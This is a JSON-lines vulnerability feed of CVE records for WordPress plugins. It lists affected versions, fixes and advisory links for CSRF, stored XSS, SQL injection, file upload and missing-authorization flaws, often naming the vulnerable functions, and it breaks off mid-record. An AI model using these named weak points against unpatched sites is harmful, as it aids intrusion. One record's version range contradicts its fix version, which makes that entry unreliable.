{"CVE_ID":"CVE-2023-29428","slug":"superb-social-share-and-follow-buttons","versionImpact":"1.1.3","versionEndExcluding":"1.1.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in SuPlugins Superb Social Media Share Buttons and Follow Buttons for WordPress plugin <=\u00a01.1.3 versions.","recommendation":"Update to version 1.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/superb-social-share-and-follow-buttons\\\/wordpress-superb-social-media-share-buttons-and-follow-buttons-plugin-1-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/superb-social-share-and-follow-buttons\\\/wordpress-superb-social-media-share-buttons-and-follow-buttons-plugin-1-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1331","slug":"redirect-redirection","versionEndExcluding":"1.1.5","description":"The Redirection WordPress plugin before 1.1.5 does not have CSRF checks in the uninstall action, which could allow attackers to make logged in admins delete all the redirections through a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f81d9340-cf7e-46c4-b669-e61f2559cb8c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f81d9340-cf7e-46c4-b669-e61f2559cb8c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-38057","slug":"th-advance-product-search","versionImpact":"1.1.4","versionEndExcluding":"1.1.5","description":"Missing Authorization vulnerability in ThemeHunk Advance WordPress Search Plugin. This issue affects Advance WordPress Search Plugin: from n\/a through 1.2.1.","recommendation":"Update to version 1.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/th-advance-product-search\\\/wordpress-th-advance-product-search-plugin-1-1-4-unauthenticated-plugin-settings-reset-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/th-advance-product-search\\\/wordpress-th-advance-product-search-plugin-1-1-4-unauthenticated-plugin-settings-reset-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-40218","slug":"th-advance-product-search","versionImpact":"1.1.4","versionEndExcluding":"1.1.5","description":"Missing Authorization vulnerability in ThemeHunk Advance WordPress Search Plugin. This issue affects Advance WordPress Search Plugin: from n\/a through 1.1.4.","recommendation":"Update to version 1.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/th-advance-product-search\\\/wordpress-th-advance-product-search-plugin-1-1-4-unauthenticated-plugin-settings-change-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/th-advance-product-search\\\/wordpress-th-advance-product-search-plugin-1-1-4-unauthenticated-plugin-settings-change-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7518","slug":"rsfirewall","versionImpact":"1.1.42","versionEndExcluding":"1.1.43","description":"The RSFirewall! plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.1.42 via the get_local_filename() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 1.1.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3306173%40rsfirewall&new=3306173%40rsfirewall&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3306173%40rsfirewall&new=3306173%40rsfirewall&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd7b0eef-3b8e-4272-bbd7-ad52088d0835?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd7b0eef-3b8e-4272-bbd7-ad52088d0835?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5161","slug":"magical-addons-for-elementor","versionImpact":"1.1.39","versionEndExcluding":"1.1.40","description":"The Magical Addons For Elementor ( Header Footer Builder, Free Elementor Widgets, Elementor Templates Library ) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_id\u2019 parameter in all versions up to, and including, 1.1.39 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.40, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb64952e-170e-47c5-87fd-d2ec60192b65?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb64952e-170e-47c5-87fd-d2ec60192b65?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magical-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/advance-skill-bars.php#L502\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magical-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/advance-skill-bars.php#L502\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3098054%40magical-addons-for-elementor&new=3098054%40magical-addons-for-elementor&sfp_email=&sfph_mail=#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3098054%40magical-addons-for-elementor&new=3098054%40magical-addons-for-elementor&sfp_email=&sfph_mail=#file9\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2967","slug":"tinymce-custom-styles","versionEndExcluding":"1.1.4","description":"The TinyMCE Custom Styles WordPress plugin before 1.1.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9afec4aa-1210-4c40-b566-64e37acf2b64\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9afec4aa-1210-4c40-b566-64e37acf2b64\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6030","slug":"logdash-activity-log","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The LogDash Activity Log WordPress plugin before 1.1.4 hooks the wp_login_failed function (from src\/Hooks\/Users.php) in order to log failed login attempts to the database, but it doesn't escape the username when it performs some SQL requests, leading to a SQL injection vulnerability which can be exploited using a time-based technique by an unauthenticated attacker.","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b658e403-006c-4555-b1b2-3603e44f4411\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b658e403-006c-4555-b1b2-3603e44f4411\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8965","slug":"absolute-reviews","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The Absolute Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Name' field of a custom post criteria in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12cfebb8-ae89-410b-a492-340f1553e83e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12cfebb8-ae89-410b-a492-340f1553e83e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156409\\\/absolute-reviews\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156409\\\/absolute-reviews\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11265","slug":"wp-maximum-upload-file-size","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The Increase Maximum Upload File Size | Increase Execution Time plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.1.3. This is due to returning image upload error messages with full path information. This makes it possible for authenticated attackers, with author-level permissions and above, to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-maximum-upload-file-size\\\/tags\\\/1.1.2\\\/inc\\\/class-wmufs-chunk-files.php#L228\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-maximum-upload-file-size\\\/tags\\\/1.1.2\\\/inc\\\/class-wmufs-chunk-files.php#L228\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-maximum-upload-file-size\\\/trunk\\\/inc\\\/class-wmufs-chunk-files.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-maximum-upload-file-size\\\/trunk\\\/inc\\\/class-wmufs-chunk-files.php#L247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191874\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191874\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e49e7cdf-93ca-415f-ba83-986cbb869220?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e49e7cdf-93ca-415f-ba83-986cbb869220?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7484","slug":"crm-perks-forms","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The CRM Perks Forms plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation on the 'handle_uploaded_files' function in versions up to, and including, 1.1.3. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02c6ec97-50cc-4c61-9bb7-b94250d5dda3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02c6ec97-50cc-4c61-9bb7-b94250d5dda3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-perks-forms\\\/trunk\\\/includes\\\/front-form.php?rev=3003885#L3271\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-perks-forms\\\/trunk\\\/includes\\\/front-form.php?rev=3003885#L3271\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3016768\\\/crm-perks-forms\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3016768\\\/crm-perks-forms\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4459","slug":"wp-show-posts","versionEndExcluding":"1.1.4","description":"The WP Show Posts WordPress plugin before 1.1.4 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ef4783b-4e4a-4691-b858-a7fa8dada4ec\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ef4783b-4e4a-4691-b858-a7fa8dada4ec\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1330","slug":"redirect-redirection","versionEndExcluding":"1.1.4","description":"The Redirection WordPress plugin before 1.1.4 does not add nonce verification in place when adding the redirect, which could allow attackers to add redirects via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de4cff6d-0030-40e6-8221-fef56e12b4de\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de4cff6d-0030-40e6-8221-fef56e12b4de\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3604","slug":"change-wp-admin-login","versionEndExcluding":"1.1.4","description":"The Change WP Admin Login WordPress plugin before 1.1.4 discloses the URL of the hidden login page when accessing a crafted URL, bypassing the protection offered.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f6615e8-f607-4ce4-a0e0-d5fc841ead16\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f6615e8-f607-4ce4-a0e0-d5fc841ead16\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6598","slug":"speedycache","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The SpeedyCache plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the speedycache_save_varniship, speedycache_img_update_settings, speedycache_preloading_add_settings, and speedycache_preloading_delete_resource functions in all versions up to, and including, 1.1.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to update plugin options.","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db8cfdba-f3b2-45dc-9be7-6f6374fd5f39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db8cfdba-f3b2-45dc-9be7-6f6374fd5f39?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010577\\\/speedycache\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010577\\\/speedycache\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4943","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","versionEndExcluding":"1.1.4","description":"The BEAR for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.1.3.3. This is due to a missing capability check on the woobe_bulkoperations_visibility function. This makes it possible for authenticated attackers (subscriber or higher) to manipulate products.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d10475f-83dd-4e59-83e4-aeaa72a22b96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d10475f-83dd-4e59-83e4-aeaa72a22b96?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L719\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L719\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4942","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","versionEndExcluding":"1.1.4","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the woobe_bulkoperations_visibility function. This makes it possible for unauthenticated attackers to manipulate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26d8b75b-befa-4c6a-b072-0da44e437174?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26d8b75b-befa-4c6a-b072-0da44e437174?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L719\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L719\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4940","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","versionEndExcluding":"1.1.4","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the woobe_bulkoperations_swap function. This makes it possible for unauthenticated attackers to manipulate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L521\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L521\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31c5e524-ef4d-48c7-baa0-595f8060a167?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31c5e524-ef4d-48c7-baa0-595f8060a167?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4937","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","versionEndExcluding":"1.1.4","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the woobe_bulkoperations_apply_default_combination function. This makes it possible for unauthenticated attackers to manipulate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L286\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L286\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40bf51bf-efb2-4504-815b-4681d1078f77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40bf51bf-efb2-4504-815b-4681d1078f77?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4935","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","versionEndExcluding":"1.1.4","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the create_profile function. This makes it possible for unauthenticated attackers to create profiles via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/639f3941-7783-4500-aca4-5e8155db6460?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/639f3941-7783-4500-aca4-5e8155db6460?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/classes\\\/models\\\/profiles.php#L191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/classes\\\/models\\\/profiles.php#L191\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/classes\\\/models\\\/profiles.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fclasses%2Fmodels%2Fprofiles.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/classes\\\/models\\\/profiles.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fclasses%2Fmodels%2Fprofiles.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4920","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","versionEndExcluding":"1.1.4","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the woobe_save_options function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Additionally, input sanitization and escaping is insufficient resulting in the possibility of malicious script injection.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/index.php?contextall=1&old=2968292&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Findex.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/index.php?contextall=1&old=2968292&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Findex.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58d25eeb-b12c-4850-8308-eaa30982b5a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58d25eeb-b12c-4850-8308-eaa30982b5a8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/index.php#L805\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/index.php#L805\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13542","slug":"wp-google-street-view","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The WP Google Street View (with 360\u00b0 virtual tour) & Google maps + Local SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpgsv' shortcode in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227140%40wp-google-street-view&new=3227140%40wp-google-street-view&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227140%40wp-google-street-view&new=3227140%40wp-google-street-view&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b1944a9-4bc4-4ac2-83c3-55d6d61f405c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b1944a9-4bc4-4ac2-83c3-55d6d61f405c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4962","slug":"video-popup","versionImpact":"1.1.3","versionEndExcluding":"1.1.4","description":"The Video PopUp plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'video_popup' shortcode in versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/670ea03e-2f76-48a4-9f40-bc4cfd987a89?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/670ea03e-2f76-48a4-9f40-bc4cfd987a89?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-popup\\\/trunk\\\/features\\\/shortcode.php?rev=2928708#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-popup\\\/trunk\\\/features\\\/shortcode.php?rev=2928708#L144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3004434\\\/video-popup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3004434\\\/video-popup\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5686","slug":"wpzoom-elementor-addons","versionImpact":"1.1.38","versionEndExcluding":"1.1.39","description":"The WPZOOM Addons for Elementor (Templates, Widgets) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 attribute within the plugin's Team Members widget in all versions up to, and including, 1.1.38 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.39, or a newer patched 